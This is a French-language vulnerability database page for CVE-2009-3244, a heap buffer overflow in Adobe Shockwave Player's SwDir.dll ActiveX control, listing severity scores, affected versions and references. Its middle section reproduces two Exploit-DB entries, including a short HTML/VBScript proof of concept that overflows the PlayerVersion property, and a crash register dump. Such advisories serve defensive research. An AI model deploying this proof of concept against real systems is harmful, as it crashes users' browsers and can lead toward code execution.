CVE-2009-3244 : Détail

CVE-2009-3244

Overflow
46.11%V4
Network
2009-09-18
08h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Heap-based buffer overflow in the SwDir.dll ActiveX control in Adobe Shockwave Player 11.5.1.601 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long PlayerVersion property value.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 10093

Date de publication : 2009-11-03 23h00 +00:00
Auteur : Francis Provencher
EDB Vérifié : Yes

<html> <object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object> <script language='vbscript'> argCount = 1 arg1=String(2097152, "A") ShockW.PlayerVersion = arg1 </script>
Exploit Database EDB-ID : 9682

Date de publication : 2009-09-14 22h00 +00:00
Auteur : Francis Provencher
EDB Vérifié : Yes

##################################################################################### Application: Adobe ShockWave Player (11.5.1.601) Platforms: Windows XP Professional French SP2 and SP3 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher (Protek Research Lab's) ##################################################################################### 1) Introduction 2) Technical details and bug 3) The Code ##################################################################################### =============== 1) Introduction =============== Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. Shockwave Player displays Web content that has been created by Adobe Director. ##################################################################################### ============================ 2) Technical details ============================ Name: SwDir.dll Ver.: 11.5.1.601 CLSID: {233C1507-6A77-46A4-9443-F871F945D258} (d40.b20): Stack overflow - code c00000fd eax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002 eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202 ##################################################################################### # milw0rm.com [2009-09-15]

Products Mentioned

Configuraton 0

Adobe>>Shockwave_player >> Version To (including) 11.5.1.601

Adobe>>Shockwave_player >> Version 1.0

Adobe>>Shockwave_player >> Version 2.0

Adobe>>Shockwave_player >> Version 3.0

Adobe>>Shockwave_player >> Version 4.0

Adobe>>Shockwave_player >> Version 5.0

Adobe>>Shockwave_player >> Version 6.0

Adobe>>Shockwave_player >> Version 8.0

Adobe>>Shockwave_player >> Version 8.0.196

Adobe>>Shockwave_player >> Version 8.0.196a

Adobe>>Shockwave_player >> Version 8.0.204

Adobe>>Shockwave_player >> Version 8.0.205

Adobe>>Shockwave_player >> Version 8.5.1

Adobe>>Shockwave_player >> Version 8.5.1.100

Adobe>>Shockwave_player >> Version 8.5.1.103

Adobe>>Shockwave_player >> Version 8.5.1.105

Adobe>>Shockwave_player >> Version 8.5.1.106

Adobe>>Shockwave_player >> Version 8.5.321

Adobe>>Shockwave_player >> Version 8.5.323

Adobe>>Shockwave_player >> Version 8.5.324

Adobe>>Shockwave_player >> Version 8.5.325

Adobe>>Shockwave_player >> Version 9

Adobe>>Shockwave_player >> Version 9.0.383

Adobe>>Shockwave_player >> Version 9.0.432

Adobe>>Shockwave_player >> Version 10.0.0.210

Adobe>>Shockwave_player >> Version 10.0.1.004

Adobe>>Shockwave_player >> Version 10.1.0.11

Adobe>>Shockwave_player >> Version 10.1.0.011

Adobe>>Shockwave_player >> Version 10.1.1.016

Adobe>>Shockwave_player >> Version 10.1.4.020

Adobe>>Shockwave_player >> Version 10.2.0.021

Adobe>>Shockwave_player >> Version 10.2.0.022

Adobe>>Shockwave_player >> Version 10.2.0.023

Adobe>>Shockwave_player >> Version 11.0.0.456

Adobe>>Shockwave_player >> Version 11.0.3.471

Adobe>>Shockwave_player >> Version 11.5.0.595

Adobe>>Shockwave_player >> Version 11.5.0.596

Adobe>>Shockwave_player >> Version 11.5.2.602

Adobe>>Shockwave_player >> Version 11.5.6.606

Adobe>>Shockwave_player >> Version 11.5.7.609

Adobe>>Shockwave_player >> Version 11.5.8.612

Références

http://www.securityfocus.com/bid/36905
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/9682
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2009/3134
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1023123
Tags : vdb-entry, x_refsource_SECTRACK